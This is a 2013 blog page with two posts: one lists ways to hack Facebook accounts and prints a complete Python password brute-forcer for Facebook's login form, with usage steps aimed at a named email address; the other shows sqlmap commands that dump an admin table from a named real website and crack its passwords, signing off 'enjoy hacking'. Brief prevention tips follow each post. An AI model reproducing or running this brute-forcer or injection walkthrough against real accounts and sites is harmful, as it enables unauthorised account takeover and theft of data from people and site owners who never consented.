Saturday, 6 July 2013
TIME 03:22
HACK FACEBOOK USING BRUTEFORCE METHOD WITH HYDRA

What is Facebook Hacking?

people who wants to steal other account and crack their password  is called facebook hacking.

Methods To Hack Facebook?

 1) Phishing : 

  The first and very basic way of hacking Facebook accounts is via Phishing. Phishing is actually creating fake web pages to steal user’s credentials like email,passwords,phone no,etc.
 2) Keylogging :
This is another good way of hacking Facebook accounts. In this type of attack a hacker simply sends an infected file having keylogger in it to the victim. If the victim executes that file on his pc, whatever he types will be mailed/uploaded to hacker’s server. The advantage of this attack is that the victim won’t know that hacker is getting every Bit of data he is typing. Another big advantage is that hacker will get passwords of all the accounts used on that PC.
 3) Trojans/backdoors :
 This is an advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can do whatever he wants with the victim’s PC .
 4)Sniffing:
It consists of stealing session in progress. In this type of attack an attacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.
5)Social Engineering :
This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.
Answering the security questions also lies under this category.
6) Session Hijacking:
In a session hijacking attack an attacker steals victims cookies, cookies stores all the necessary logging Information about one’s account, using this info an attacker can easily hack anybody’s account. If you get the cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook, Google, Yahoo. 
HACK FACEBOOK USING BRUTEFORCE METHOD:

1) go to privilege escalation then select online attacks and then select hydra

2) then use python script for the brute force attack you can attack the victim only when he is in online

3) get the python script
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname     : facebookbruteforcer.py
# Programmer     : krishna_ <krishnakumar.m13@gmail.com>
# Version    : 1.0
# Date        : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)

import re
import os
import sys
import random
import warnings
import time
try:
    import mechanize
except ImportError:
    print "[*] Please install mechanize python module first"
    sys.exit(1)
except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
try:
    import cookielib
except ImportError:
    print "[*] Please install cookielib python module first"
    sys.exit(1)
except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
   
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable
__programmer__     = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__        = "1.0"
verbose     = False
useproxy    = False
usepassproxy    = False
log        = 'fbbruteforcer.log'
file        = open(log, "a")
success        = 'http://www.facebook.com/?sk=messages&amp;ref=mb'
fblogin     = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent     = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
        'amaya/9.51 libwww/5.4.0',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
        ]
facebook     = '''
  __               _                 _   
 / _|             | |               | |  
| |_ __ _  ___ ___| |__   ___   ___ | | __
|  _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_|  __/ |_) | (_) | (_) |   <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
                    bruteforcer...
                   
Programmer : %s
Version       : %s''' % (__programmer__, __version__)
option               = '''
Usage  : %s [options]
Option : -u, --username      <username>         |   User for bruteforcing
         -w, --wordlist      <filename>         |   Wordlist used for bruteforcing
         -v, --verbose                |   Set %s will be verbose
         -p, --proxy         <host:port>    |   Set http proxy will be use
         -k, --usernameproxy    <username>    |   Set username at proxy will be use
         -i, --passproxy    <password>    |   Set password at proxy will be use
         -l, --log         <filename>    |   Specify output filename (default : fbbruteforcer.log)
         -h, --help          <help>             |   Print this help
                                                           
Example : %s -u brad@hackme.com -w wordlist.txt"
      
P.S : add "&" to run in the background 
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme         = '''
Usage : %s [option]
    -h or --help for get help
    ''' % sys.argv[0]


def helpme():
    print facebook
    print option
    file.write(facebook)
    file.write(option)
    sys.exit(1)
   
def helpmee():
    print facebook
    print hme
    file.write(facebook)
    file.write(hme)
    sys.exit(1)
   
for arg in sys.argv:
    try:
        if arg.lower() == '-u' or arg.lower() == '--user':
                    username = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                    wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-l' or arg.lower() == '--log':
                    log = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--proxy':
                useproxy = True
                    proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-k' or arg.lower() == '--userproxy':
                usepassproxy = True
                    usw = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-i' or arg.lower() == '--passproxy':
                usepassproxy = True
                    usp = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-v' or arg.lower() == '--verbose':
                    verbose = True
            elif arg.lower() == '-h' or arg.lower() == '--help':
                helpme()
        elif len(sys.argv) <= 1:
            helpmee()
    except IOError:
        helpme()
    except NameError:
        helpme()
    except IndexError:
        helpme()
                   
def bruteforce(word):
    try:
        sys.stdout.write("\r[*] Trying %s...                    " % word)
        file.write("[*] Trying %s\n" % word)
        sys.stdout.flush()
        br.addheaders = [('User-agent', random.choice(ouruseragent))]
        opensite = br.open(fblogin)
        br.select_form(nr=0)
        br.form['email'] = username
        br.form['pass'] = word
        br.submit()
        response = br.response().read()
        if verbose:
            print response
        if success in response:
            print "\n\n[*] Logging in success..."
            print "[*] Username : %s" % (username)
            print "[*] Password : %s\n" % (word)
            file.write("\n[*] Logging in success...")
            file.write("\n[*] Username : %s" % (username))
            file.write("\n[*] Password : %s\n\n" % (word))
            sys.exit(1)   
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
    except mechanize._mechanize.FormNotFoundError:
        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
        sys.exit(1)
    except mechanize._form.ControlNotFoundError:
        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
        sys.exit(1)
       
def releaser():
    global word       
    for word in words:
        bruteforce(word.replace("\n",""))
       
def main():
    global br
    global words
    try:
        br = mechanize.Browser()
        cj = cookielib.LWPCookieJar()
        br.set_cookiejar(cj)
        br.set_handle_equiv(True)
        br.set_handle_gzip(True)
        br.set_handle_redirect(True)
        br.set_handle_referer(True)
        br.set_handle_robots(False)
        br.set_debug_http(False)
        br.set_debug_redirects(False)
        br.set_debug_redirects(False)
        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
        if useproxy:
            br.set_proxies({"http": proxy})
        if usepassproxy:
            br.add_proxy_password(usw, usp)
        if verbose:
            br.set_debug_http(True)
            br.set_debug_redirects(True)
            br.set_debug_redirects(True)
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        file.write("\n[*] Exiting program...\n")
        sys.exit(1)
    try:
        preventstrokes = open(wordlist, "r")
        words            = preventstrokes.readlines()
        count          = 0
        while count < len(words):
            words[count] = words[count].strip()
            count += 1
    except IOError:
          print "\n[*] Error: Check your wordlist path\n"
        file.write("\n[*] Error: Check your wordlist path\n")
          sys.exit(1)
    except NameError:
        helpme()
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        file.write("\n[*] Exiting program...\n")
        sys.exit(1)
    try:
        print facebook
        print "\n[*] Starting attack at %s" % time.strftime("%X")
        print "[*] Account for bruteforcing %s" % (username)
        print "[*] Loaded :",len(words),"words"
        print "[*] Bruteforcing, please wait..."
        file.write(facebook)
        file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
        file.write("\n[*] Account for bruteforcing %s" % (username))
        file.write("\n[*] Loaded : %d words" % int(len(words)))
        file.write("\n[*] Bruteforcing, please wait...\n")
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
    try:
        releaser()
        bruteforce(word)
    except NameError:
        helpme()

if __name__ == '__main__':
    main()

4) then create a new file and upload this code and save it as facebookbruteforce.py


5) then put python facebookbruteforce.py


6) then put python facebookbruteforce.py -h


7) now you write your victim mail id facebookbruteforce.py -u krishnakumar.m13@gmail.com -w wordlist.txt


8) because we have to create a word list and upload that after that it will brute force the particular email and the password will be found in password.txt file


How To Prevent my facebook Account From Being Hacked?

 1) You can enable Login Notification so that whenever any body (or a hacker) tries to login with your User ID and Password, you will receive a Notification on your cell phone and you will come to know that it's time to change your password right now because the hacker has got your password and is trying to log in to your Facebook Account.

2) To Enable Login Nofication
Go to Home -> Account Settings -> Security -> Login Notification. Put a Check Mark on your preffered option 

3) Always check your Active Sessions. If you notice any unfamiliar location or device, it means your Facebook Account is at risk. Just click on End Activity and dont forget to change your password after that.


4) To Check Active Sessions
Go to Home -> Account Settings -> Security -> Active Sessions. 

5) Enable Secure Browsing to make your account more secure.
Go to Home-> Account Settings -> Security -> Secure Browsing

Filled
16
Unknown
Read More
Saturday, 26 January 2013
TIME 06:41
HACKING A WEBSITE USING SQL

HACKING A WEBSITE

what is sql Injection?

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.
In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

 How does it cause Vernerabilites?
It can lead to vulnerabilities because attackers can send values to an application that they know will be interpolated into a SQL string. By being very clever, they can manipulate the result of queries, reading data or even changing data that they shouldn't be allowed to do.


How to Use it in Backtrack?

1. Open Terminal and go to sqlmap Dir: 
- cd /pentest/web/scanners/sqlmap/
2. To use it type :
-python sqlmap.py -u http://Target.com/index.php?id=1 --dbs ( For database )
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) --table
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) --colum
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) -C (columname) --dump




1) open a terminal in backtrack 5
2) type cd /pentest/database/sqlmap
3) then type this python sqlmap.py -u http://mappn.com/game.php?id=9 --dbs
4) http://mappn.com/game.php?id=9 its the website that we are to going to hack
5) id=9 is vernurable that is its easy to hack
6) [*] information_schema
[*] us_mappn
 these are the 2 avilable database in the website
7) then search for tables and columns
8) python sqlmap.py -u http://mappn.com/game.php?id=9 -D (database name) --tables
9) leave information_schema its the database that will be available for all website
10) then finding system admin file
11) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin --columns
12) we already found admin file now we are getting the info of admin file
13) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin -U test --dump
14) then using common default dictionary method we are cracking the password




15) now the user id and the password has been cracked
now
how to find vernurable web sites
go to this http://mappn.com/game.php?id=9 put (')
mappn.com/game.php?id=9' now press enter



nw see sql error will occur now this is vernurable


thank you and enjoy hacking




who to prevent sql attack?


  • Strict type checking ( Don’t trust what the user enters )
  • If you expect user name to be entered, then validate whether it contains only alpha numerals.
  • Escape or filter the special characters and user inputs.
  • Use prepared statements to execute the queries.
  • Don’t allow multiple queries to be executed on a single statement.
  • Don’t leak the database information to the end user by displaying the “syntax errors”, etc..


Filled
6
Unknown
Read More
Subscribe to: Posts (Atom)